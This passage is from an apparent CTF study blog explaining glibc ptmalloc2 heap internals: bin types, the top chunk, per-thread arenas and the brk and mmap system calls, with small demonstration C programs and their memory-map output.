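style="text-align:left">1</td><td style="text-align:left">bk of bin1 / size of bin2</td></tr><tr><td style="text-align:left">2</td><td style="text-align:left">fd of bin2 / prev_size of bin3</td></tr><tr><td style="text-align:left">3</td><td style="text-align:left">bk of bin2 / size of bin3</td></tr></tbody></table><p>The prev_size and size of bin2 overlap with the fd and bk of bin1. Because only fd and bk are ever used to walk a list, the overlapping words actually hold the fd and bk of bin1. In other words, although a bin shares part of its data with the bin before it, the shared part still records the list pointers of the earlier bin. This reuse saves space.</p><p>The bins in the array are, in order:</p><ol><li>The first is the unsorted bin. As the name suggests, its chunks are not sorted, and it holds chunks of mixed sizes.</li><li>Bins with indices 2 to 63 are small bins. All chunks in one small bin list have the same size. Chunks in two adjacent small bins differ in size by 2 machine words: 8 bytes on 32-bit and 16 bytes on 64-bit.</li><li>The bins after the small bins are large bins. Each large bin holds chunks within a size range, ordered from largest to smallest along the fd pointer. Chunks of equal size are ordered by most recent use.</li></ol><blockquote><p>The in-use flag of a fastbin chunk always stays set to 1, so these chunks are not merged with their neighbours.</p></blockquote><h3 id="fast-bin">Fast Bin</h3><p>On 32-bit systems, chunks of 16 to
80 bytes are called fast chunks. Of all the bins, the fast bin path offers the fastest allocation and release.</p><ul><li><strong>Count</strong>: 10</li><li>Each fast bin maintains a singly linked list of free chunks. A singly linked list suffices because all chunks in a list have the same size, so insertion and removal only happen at the head of the list: LIFO (last in, first out).</li><li>Chunk size: increases in steps of 8 bytes</li><li>Fast bins are a series of bins whose chunk sizes increase in 8-byte steps: <code>fast bin[0]</code> holds 16-byte chunks, <code>fast bin[1]</code> holds 24-byte chunks, and so on.</li><li>All chunks in a given fast bin have the same size;</li><li>During malloc initialization, the maximum fast bin size is set to 64 bytes rather than 80, because by default only chunks of 16 to 64 bytes are treated as fast chunks.</li><li>No coalescing: two adjacent free chunks are not merged. This can increase fragmentation, but it makes free much faster.</li><li><code>malloc(fast chunk)</code></li><li>Initially the maximum fast chunk size and the fast bin data structures are not initialized, so even a request in the fast chunk range is served by the small bin path rather than the fast bin path;</li><li>After initialization, the fast bin index is computed and the corresponding bin is looked up;</li><li>The first chunk found in that bin is removed and returned to the user.</li><li><code>free(fast chunk)</code><ul><li>Compute the fast bin index to locate the corresponding bin;</li><li>The freed chunk is added at the head of that bin.<br><img src="/images/heap_glibc_malloc_bin/fast_chunk.png" alt="fast_chunk.png"></li></ul></li></ul><h3 id="unsorted-bin">Unsorted Bin</h3><p>When a small or large chunk is freed, it is not put into its own bin but into the unsorted bin. This lets the allocator reuse recently freed chunks without spending time looking for the right bin, which speeds up allocation and release.</p><blockquote><p>When are chunks in the unsorted bin moved to the small/large bins? 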
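 -> During allocation, after the fast and small bins have been searched without success, chunks in the unsorted bin are, under certain conditions, moved into the appropriate (small or large) bin.</p></blockquote><h4 id="数量-大小">Count and size</h4><ul><li>The unsorted bin consists of one doubly linked list of free chunks.</li><li>There is no size restriction; a chunk of any size can be placed here.<br><img src="/images/heap_glibc_malloc_bin/unsorted_bin.png" alt></li></ul><h3 id="small-bin">Small Bin</h3><p>Chunks smaller than 512 bytes are called small chunks, and the bins that hold them are called small bins.</p><h4 id="数量-大小">Count and size</h4><ul><li>Count: 62<ul><li>Each small bin maintains a circular doubly linked list of free chunks. A doubly linked list is used because chunks in a small bin may be unlinked from the middle of the list. New entries are added at the head of the list and removed from the tail.</li></ul></li><li>Chunk size: increases in steps of 8 bytes.<ul><li>Small bins are a series of bins whose chunk sizes increase in 8-byte steps. For example, small bin[0] (Bin 2) holds 16-byte chunks, small bin[1] (Bin 3) holds 24-byte chunks, and so on. All chunks in a given small bin have the same size, so no sorting is needed.</li></ul></li></ul><h4 id="合并">Coalescing</h4><p>Adjacent free chunks are merged. This reduces fragmentation but slows down <code>free</code>.</p><h4 id="malloc-small-chunk">malloc(small chunk)</h4><ul><li>Initially all small bins are NULL, so a small chunk request is served by the unsorted bin path rather than the small bin path;</li><li>On the first call to malloc, the small bins and large bins in malloc_state are initialized so that each points to itself, which marks it as empty;</li><li>Afterwards, when a small bin is non-empty, its last chunk is removed and returned to the user;</li></ul><h4 id="free-small-chunk">free(small chunk)</h4><p>When a chunk is freed, its neighbours are checked. Any free neighbour is unlinked from its list and merged with it, and the resulting chunk is added to the front of the unsorted bin.</p><h3 id="large-bin">Large Bin</h3><h4 id="大小-数量">Size and count</h4><ul><li>Count: 63<ul><li>Each large bin maintains a circular doubly linked list of free chunks. A doubly linked list is used because chunks in a large bin may be inserted or removed at any position.</li></ul></li><li>Size: chunks in a large bin need not have the same size; they are stored in decreasing order, with the largest chunk at the head and the smallest at the tail;<ul><li>Of these 63 bins:<ul><li>32 bins hold chunks in steps of 64 bytes: large bin[0] (Bin 65) holds chunks of 512 B to 568 B, large bin[1] (Bin 66) holds chunks of 576 B to 632 B, and so on;</li><li>16 bins hold chunks in steps of 512 bytes;</li><li>8 bins hold chunks in steps of 4096 bytes;</li><li>4 bins hold chunks in steps of 32768 bytes;</li><li>2 bins hold chunks in steps of 262144 bytes;</li><li>1 bin holds chunks of all remaining sizes;</li></ul></li></ul></li></ul><h4 id="合并">Coalescing</h4><p>Two adjacent free chunks
are merged.</p><h4 id="malloc-large-chunk">malloc(large chunk)</h4><ul><li>Initially all large bins are NULL, so a large chunk request is served by the next largest bin path rather than the large bin path.</li><li>On the first call to malloc, the small bins and large bins in malloc_state are initialized so that each points to itself, which marks it as empty;</li><li>Afterwards, when a large bin is non-empty and its largest chunk is larger than the request, the allocator walks the bin from head to tail to find the chunk whose size is closest to the request. Once found, that chunk is split in two:<ul><li>User chunk (the requested size): returned to the user;</li><li>Remainder chunk (what is left): added to the unsorted bin.</li></ul></li><li>If the largest chunk in the bin is smaller than the request, the allocator scans the binmaps for the smallest non-empty bin. If such a bin is found, a suitable chunk is taken from it and split for the user; otherwise the top chunk serves the request.</li></ul><h4 id="free-large-chunk">free(large chunk)</h4><p>Similar to small chunks.</p><h3 id="top-chunk">Top Chunk</h3><p>The chunk at the top of an arena is called the top chunk. It does not belong to any bin. When no bin has a suitable free block, the top chunk is used to serve the request.</p><p>When the top chunk is larger than the request, it is split into two parts:</p><ul><li>User chunk, returned to the user;</li><li>Remainder chunk, the rest, which becomes the new top chunk.</li></ul><p>When the top chunk is smaller than the request, it is extended with the <code>sbrk</code> (main arena) or <code>mmap</code> (thread arena) system call.</p><p>The prev_inuse bit of the top chunk is always 1; otherwise the chunk before it would have been merged into the top chunk. <strong>Initially, the unsorted chunk can be treated as the top chunk</strong>.</p><h4 id="last-remainder-chunk">Last Remainder Chunk</h4><p>The last remainder chunk is the remainder left over from the most recent split of a small request. It helps locality of reference: subsequent malloc requests for small chunks may end up being allocated next to each other.</p><p>Which of the chunks in an arena qualifies as the last remainder chunk?<br>When a small chunk request cannot be served from a small bin or the unsorted bin, the allocator scans the binmaps for the smallest non-empty bin. As mentioned above, if such a bin is found, its best-fitting chunk is split into two parts:</p><ul><li>the User chunk, returned to the user</li><li>the Remainder chunk, added to the unsorted bin<br><strong>This Remainder chunk becomes the last remainder chunk.</strong></li></ul><h1>glibc_malloc_threading</h1><h2 id="多线程支持">Multithreading support</h2><p>Early Linux used dlmalloc as the default allocator. In dlmalloc only one thread at a time can enter the critical section, because all threads share the freelist data structures. In ptmalloc2, when two threads call malloc at the same time, both are served right away, because each thread maintains a separate heap segment and the freelist data structures for those heaps are separate too. Maintaining separate heap and freelist data structures for each thread is called per thread arena.</p><h2 id="分析案例">Case study</h2><div class="code-wrapper"><pre><code class="hljs c"><span 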
class="hljs-comment">/* Per thread arena example. */</span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><pthread.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><sys/types.h></span></span><span class="hljs-type">void</span>* <span class="hljs-title function_">threadFunc</span><span class="hljs-params">(<span class="hljs-type">void</span>* arg)</span> { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Before malloc in thread 1\n"</span>); getchar(); <span class="hljs-type">char</span>* addr = (<span class="hljs-type">char</span>*) <span class="hljs-built_in">malloc</span>(<span class="hljs-number">1000</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After malloc and before free in thread 1\n"</span>); getchar(); <span class="hljs-built_in">free</span>(addr); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After free in thread 1\n"</span>); getchar();}<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span> { <span class="hljs-type">pthread_t</span> t1; <span class="hljs-type">void</span>* s; <span class="hljs-type">int</span> ret; <span class="hljs-type">char</span>* addr; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Welcome to per thread arena example::%d\n"</span>,getpid()); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Before malloc in main thread\n"</span>); getchar(); addr = (<span class="hljs-type">char</span>*) <span 
class="hljs-built_in">malloc</span>(<span class="hljs-number">1000</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After malloc and before free in main thread\n"</span>); getchar(); <span class="hljs-built_in">free</span>(addr); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After free in main thread\n"</span>); getchar(); ret = pthread_create(&t1, <span class="hljs-literal">NULL</span>, threadFunc, <span class="hljs-literal">NULL</span>); <span class="hljs-keyword">if</span>(ret) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Thread creation error\n"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>; } ret = pthread_join(t1, &s); <span class="hljs-keyword">if</span>(ret) { <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Thread join error\n"</span>); <span class="hljs-keyword">return</span> <span class="hljs-number">-1</span>; } <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>The run did not behave as expected (possibly because of a different kernel version).</p><h4 id="主线程malloc前">Before malloc in the main thread</h4><div class="code-wrapper"><pre><code class="hljs bash">Welcome to per thread arena example::10710Before malloc <span class="hljs-keyword">in</span> main thread<span class="hljs-built_in">cat</span> /proc/10710/maps00400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="主线程malloc之后">After malloc in the main thread</h4><p>The main thread's heap is created by moving the program break (brk). Although only 1000 bytes were requested, a 132 KB heap is created. This contiguous heap region is called an arena; because it was created by the main thread, it is the main arena. Subsequent requests are served from the remaining part of the arena. When it runs out, the heap is grown by moving brk again, and the size of the top chunk is adjusted to include the new region. Likewise, the arena can shrink when the top chunk becomes too large.</p><blockquote><p>The top chunk is the
topmost chunk of an arena.</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">After malloc and before free <span class="hljs-keyword">in</span> main thread<span class="hljs-built_in">cat</span> /proc/10710/maps00400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="主线程free之后">After free in the main thread</h4><p>When an allocated region is freed, it is not returned to the operating system immediately; it is only handed back to the allocator, which is library code. The freed memory is added to the main arena's bins (in glibc malloc, the freelist data structures are called bins). When the user later requests memory, the allocator does not ask the kernel for a new heap but first looks for free memory in the bins. Only when the bins hold no suitable free memory does the allocator go back to the kernel.</p><div class="code-wrapper"><pre><code class="hljs bash">After free <span class="hljs-keyword">in</span> main thread00400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="在thread1-malloc前">Before malloc in thread1</h4><blockquote><p>thread1's heap does not exist yet, but its stack has been created (the thread function has been entered).</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">Before malloc <span class="hljs-keyword">in</span> thread 100400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae130e4000-7fae130e5000 ---p 00000000 00:00 0 7fae130e5000-7fae138e5000 rw-p 00000000 00:00 0 7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="在thread1-malloc之后">After malloc in
thread1</h4><p>thread1's heap segment is created in the memory-mapping segment, which shows that this heap was obtained with the mmap system call rather than with sbrk as in the main thread. Similarly, although the user only requested 1000 B, 1 MB of heap memory is mapped into the process address space (that figure is for 32-bit systems; in the 64-bit run below the reserved range 7fae0c000000-7fae10000000 is 64 MB). Of this mapping, only 132 KB is given read/write permission and becomes the thread's heap. This contiguous 132 KB region is called a thread arena.</p><blockquote><p>Note: when a request exceeds 128 KB (for example malloc(132*1024)) and the arena does not have enough space to satisfy it, the memory is allocated with the mmap system call (no longer sbrk), regardless of whether the request comes from the main arena or a thread arena.</p></blockquote><div class="code-wrapper"><pre><code class="hljs bash">7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.soAfter malloc and before free <span class="hljs-keyword">in</span> thread 100400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae0c000000-7fae0c021000 rw-p 00000000 00:00 0 7fae0c021000-7fae10000000 ---p 00000000 00:00 0 7fae130e4000-7fae130e5000 ---p 00000000 00:00 0 7fae130e5000-7fae138e5000 rw-p 00000000 00:00 0 7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h4 id="在thread1-free之后">After free in thread1</h4><p><code>free</code> does not return the memory to the operating system; it hands it to the allocator, which adds it to the thread arena's bins.</p><div class="code-wrapper"><pre><code class="hljs bash">After free <span class="hljs-keyword">in</span> thread 100400000-00401000 r-xp 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading00600000-00601000 rw-p 00000000 08:01 789522 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/threading020c1000-020e2000 rw-p 00000000 00:00 0 [heap]7fae0c000000-7fae0c021000 rw-p 00000000 00:00 0 7fae0c021000-7fae10000000 ---p 00000000 00:00 0 7fae130e4000-7fae130e5000 ---p 00000000 00:00 0 7fae130e5000-7fae138e5000 rw-p 00000000 00:00 0 7fae138e5000-7fae13aa5000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><h2 
id="总结">总结</h2><p>虽然实际实验的结果并没有那么理想,但是我们可以总结其中我们需要理解的点。</p><ol><li><p>ptmalloc中可以支持多线程同时申请堆块,并且每个线程可以独立管理。</p></li><li><p>主线程中产生的areana是brk产生的,线程中是mmap产生的。</p></li><li><p>第一次brk、mmap的堆空间的申请都会产生一块很大的空间(主:132kb的堆;线程:1MB,132KB 被设置了读写权限)</p></li><li><p>申请的堆空间被free后并不是直接返还,而是给分配器,后续按照bin进行处理管理。</p></li></ol><h1>glibc_malloc_arena</h1><h2 id="arena">Arena</h2><h3 id="arena的数量">arena的数量</h3><p>上面可以见的,主线程中包含main areana,而线程中可以包含其自己管理的thread arena。但是线程拥有的arena数量受限制系统核数(数量过多,开销过高,效率降低)</p><div class="code-wrapper"><pre><code class="hljs bash">For 32 bit systems:Number of arena = 2 * number of cores.For 64 bit systems:Number of arena = 8 * number of cores.</code></pre></div><h3 id="multiple-arena">Multiple Arena</h3><p>(arena共享、复用?)<br>例如,现有有一个场景有一个运行在单核计算机上的32位操作系统上的多线程应用,开启了四个线程(一个主线程+3个线程)。这里的线程数4>(2*1),所以分配器中可能有arena会被线程共享。</p><p>那么如何进行共享的呢?</p><blockquote><ol><li>当主线程第一次调用malloc,已经建立的main areana会被没有任何竞争的使用。</li><li>当thread1和thread2第一次调用malloc的时候,新的 arena 将被创建,且将被没有任何竞争地使用。此时线程和 arena 之间存在一一映射关系。</li><li>当thread3第一次调用 malloc 时,arena 的数量限制被计算出来,结果显示已超出,因此尝试复用已经存在的 arena(也即 Main arena 或 Arena 1 或 Arena 2);</li><li>复用:<ul><li>一旦遍历到可用arena,就开始自旋申请该arena的锁;</li><li>如果上锁成功(比如说main arena上锁成功),就将该arena返回用户;</li><li>如果没找到可用arena,thread 3的malloc将被阻塞,直到有可用的arena为止。</li></ul></li><li>当thread 3调用 malloc时(第二次了),分配器会尝试使用上一次使用的 arena(也即,main arena),从而尽量提高缓存命中率。当 main arena 可用时就用,否则 thread 3 就一直阻塞,直至 main arena 空闲。因此现在 main arena 实际上是被 main thread 和 thread 3 所共享。</li></ol></blockquote><h3 id="multiple-heaps">Multiple Heaps</h3><p>在glibc malloc中主要有3种数据结构:</p><ul><li><a href="https://github.com/sploitfun/lsploits/blob/master/glibc/malloc/arena.c#L59">heap_info</a> ——Heap Header—— 一个thread arena可以维护多个堆。每个堆都有自己的堆 Header(注:也即头部元数据)。一般情况下,每个thread arena都只维护一个堆,什么时候Thread Arena会维护多个堆呢?当这个堆的空间耗尽时,新的堆(而非连续内存区域)就会被mmap到这个 aerna里;</li><li><a href="https://github.com/sploitfun/lsploits/blob/master/glibc/malloc/malloc.c#L1671">malloc_state</a> ——Arena header—— 一个thread arena可以维护多个堆,这些堆另外共享同一个 arena 
header. The arena header describes the bins, the top chunk, the last remainder chunk, and so on;</li><li><a href="https://github.com/sploitfun/lsploits/blob/master/glibc/malloc/malloc.c#L1108">malloc_chunk</a> (chunk header): each heap is divided into chunks according to user requests, and every chunk has its own chunk header.</li></ul><blockquote><p>The main arena never maintains multiple heaps, so it needs no heap_info. When it runs out of space, unlike a thread arena, the main arena extends its heap segment with sbrk until the segment runs into the memory mapping segment;<br>Also unlike a thread arena, the main arena's arena header is not stored in the heap segment obtained through sbrk. It is a global variable that can be found in the data segment of libc.so.</p></blockquote><p><img src="/images/heap_glibc_malloc_bin/threading1.png" alt><br><img src="/images/heap_glibc_malloc_bin/threading2.png" alt></p><h1>glibc_malloc_system_call</h1><h2 id="syscalls-used-by-malloc">Syscalls used by malloc</h2><h3 id="brk">brk</h3><p>brk obtains memory (not zero-initialized) from the kernel by raising the program break (program break location / brk). Initially, the start (start_brk) and the end (brk) of the heap segment point to the same location.</p><blockquote><p>With ASLR off, start_brk and brk both point to the end of the data/bss segment (end_data).<br>With ASLR on, start_brk and brk both equal the end of the data/bss segment (end_data) plus a random brk offset.</p></blockquote><p><img src="/images/heap_glibc_malloc_bin/start_brk_brk.png" alt></p><div class="code-wrapper"><pre><code class="hljs c"><span class="hljs-comment">/* sbrk and brk example */</span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;stdio.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;unistd.h&gt;</span></span>
<span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string">&lt;sys/types.h&gt;</span></span>

<span class="hljs-type">int</span> <span class="hljs-title function_">main</span><span class="hljs-params">()</span>
{
        <span class="hljs-type">void</span> *curr_brk, *tmp_brk = <span class="hljs-literal">NULL</span>;

        <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Welcome to sbrk example:%d\n"</span>, getpid());

        <span class="hljs-comment">/* sbrk(0) gives current program break location */</span>
        tmp_brk = curr_brk = sbrk(<span class="hljs-number">0</span>);
        <span 
class="hljs-built_in">printf</span>(<span class="hljs-string">"Program Break Location1:%p\n"</span>, curr_brk); getchar(); <span class="hljs-comment">/* brk(addr) increments/decrements program break location */</span> brk(curr_brk+<span class="hljs-number">4096</span>); curr_brk = sbrk(<span class="hljs-number">0</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Program break Location2:%p\n"</span>, curr_brk); getchar(); brk(tmp_brk); curr_brk = sbrk(<span class="hljs-number">0</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Program Break Location3:%p\n"</span>, curr_brk); getchar(); <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;}</code></pre></div><p>输出:</p><div class="code-wrapper"><pre><code class="hljs bash"> ./brk Welcome to sbrk example:6699Program Break Location1:0x21cd000 -> <span class="hljs-built_in">cat</span> map(下)Program <span class="hljs-built_in">break</span> Location2:0x21ce000Program Break Location3:0x21cd000</code></pre></div><div class="code-wrapper"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> /proc/6699/maps00400000-00401000 r-xp 00000000 08:01 789617 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/brk00600000-00601000 rw-p 00000000 08:01 789617 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/brk021ac000-021ce000 rw-p 00000000 00:00 0 [heap]7f0b29077000-7f0b29237000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b29237000-7f0b29437000 ---p 001c0000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b29437000-7f0b2943b000 r--p 001c0000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b2943b000-7f0b2943d000 rw-p 001c4000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so7f0b2943d000-7f0b29441000 rw-p 00000000 00:00 0 7f0b29441000-7f0b29467000 r-xp 00000000 08:01 2629229 /lib/x86_64-linux-gnu/ld-2.23.so7f0b29642000-7f0b29645000 rw-p 00000000 00:00 0 7f0b29666000-7f0b29667000 r--p 00025000 08:01 2629229 
/lib/x86_64-linux-gnu/ld-2.23.so7f0b29667000-7f0b29668000 rw-p 00026000 08:01 2629229 /lib/x86_64-linux-gnu/ld-2.23.so7f0b29668000-7f0b29669000 rw-p 00000000 00:00 0 7ffcb750d000-7ffcb752e000 rw-p 00000000 00:00 0 [stack]7ffcb7598000-7ffcb759b000 r--p 00000000 00:00 0 [vvar]7ffcb759b000-7ffcb759d000 r-xp 00000000 00:00 0 [vdso]ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]</code></pre></div><h3 id="mmap">mmap</h3><p>malloc通过mmap进行私有匿名的段映射。私有匿名映射的目的是分配新内存(零填充),而新内存将由调用进程使用。</p><h4 id="分析实例">分析实例</h4><div class="code-wrapper"><pre><code class="hljs bash">/* Private anonymous mapping example using mmap syscall */<span class="hljs-comment">#include <stdio.h></span><span class="hljs-comment">#include <sys/mman.h></span><span class="hljs-comment">#include <sys/types.h></span><span class="hljs-comment">#include <sys/stat.h></span><span class="hljs-comment">#include <fcntl.h></span><span class="hljs-comment">#include <unistd.h></span><span class="hljs-comment">#include <stdlib.h></span>void static inline errExit(const char* msg){ <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s failed. Exiting the process\n"</span>, msg); <span class="hljs-built_in">exit</span>(-1);}int <span class="hljs-function"><span class="hljs-title">main</span></span>(){ int ret = -1; <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Welcome to private anonymous mapping example::PID:%d\n"</span>, getpid()); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"Before mmap\n"</span>); getchar(); char* addr = NULL; addr = mmap(NULL, (size_t)132*1024, PROT_READ|PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); <span class="hljs-keyword">if</span> (addr == MAP_FAILED) errExit(<span class="hljs-string">"mmap"</span>); <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After mmap\n"</span>); getchar(); /* Unmap mapped region. 
*/
    ret = munmap(addr, (size_t)132*1024);
    <span class="hljs-keyword">if</span>(ret == -1)
        errExit(<span class="hljs-string">"munmap"</span>);
    <span class="hljs-built_in">printf</span>(<span class="hljs-string">"After munmap\n"</span>);
    getchar();
    <span class="hljs-built_in">return</span> 0;
}</code></pre></div><div class="code-wrapper"><pre><code class="hljs bash">Before mmap
00400000-00401000 r-xp 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap
00600000-00601000 rw-p 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap
00f74000-00f95000 rw-p 00000000 00:00 0 [heap]
7f46271b0000-7f4627370000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so
After mmap
00400000-00401000 r-xp 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap
00600000-00601000 rw-p 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap
00f74000-00f95000 rw-p 00000000 00:00 0 [heap]
7f46271b0000-7f4627370000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so
After munmap
00400000-00401000 r-xp 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap
00600000-00601000 rw-p 00000000 08:01 789619 /home/giantbranch/Desktop/CTF/PWN/glibc_malloc/mmap
00f74000-00f95000 rw-p 00000000 00:00 0 [heap]
7f46271b0000-7f4627370000 r-xp 00000000 08:01 2629237 /lib/x86_64-linux-gnu/libc-2.23.so</code></pre></div><p>In theory a new region of the requested size, 0x21000 bytes (132 KB), should appear after mmap, but nothing changes in the output above. The likely explanation is that mmap does not grow the [heap] segment: a private anonymous mapping is placed in the memory mapping segment, typically next to the libc and ld mappings, and the dumps above stop at the first libc line, so that area is not shown. After munmap the added region is removed again and the layout returns to what it was before the mapping.</p><h3 id="总结">Summary</h3><ol><li>brk pushes _edata, the pointer to the highest address of the data segment (.data), toward higher addresses; malloc uses brk for requests smaller than 128 KB. The first figure below shows an example: a 30 KB block A is allocated first, then block B. In both cases moving _edata is all it takes to complete the allocation (the physical pages are only assigned later, when the process first accesses the memory and triggers a page fault). A's memory can only be given back after B has been freed, which is how brk produces fragmentation.</li></ol><p><img src="/images/heap_glibc_malloc_bin/brk_push_edata.jpg" alt></p><ol start="2"><li>mmap finds a free block of virtual memory in the process's virtual address space (between the heap and the stack, in what is called the file mapping region) and allocates it. Any such block can be released on its own at any time.</li></ol><p><img src="/images/heap_glibc_malloc_bin/mmap_chunk.jpg.jpg" alt></p><h1>References</h1><ul><li><a 
href="https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/">Understanding glibc malloc</a></li><li><a href="https://sploitfun.wordpress.com/2015/02/11/syscalls-used-by-malloc/">syscall used by malloc</a></li><li><a href="https://ctf-wiki.org/pwn/linux/user-mode/heap/ptmalloc2/heap-structure/#bin">CTF Wiki-堆相关数据结构</a></li><li><a href="https://www.cnblogs.com/vinozly/p/5489138.html">Linux进程分配内存的两种方式–brk() 和mmap()</a></li><li>CSDN<ul><li><a href="https://blog.csdn.net/maokelong95/article/details/51989081">理解 glibc malloc:主流用户态内存分配器实现原理</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366849?spm=1001.2014.3001.5501">堆基础-glibc_malloc_threading</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366820?spm=1001.2014.3001.5501">堆基础-glibc_malloc_system_call</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366718">堆基础-glibc_malloc_bin</a></li><li><a href="https://blog.csdn.net/qq_43390703/article/details/121366777">堆基础-glibc_malloc_chunk</a></li></ul></li></ul>]]></content>
<categories>
<category> Pwn </category>
</categories>
<tags>
<tag> Heap </tag>
<tag> 堆 </tag>
</tags>
</entry>
<entry>
<title>恋音と雨空</title>
<link href="/2026/01/30/rain/"/>
<url>/2026/01/30/rain/</url>
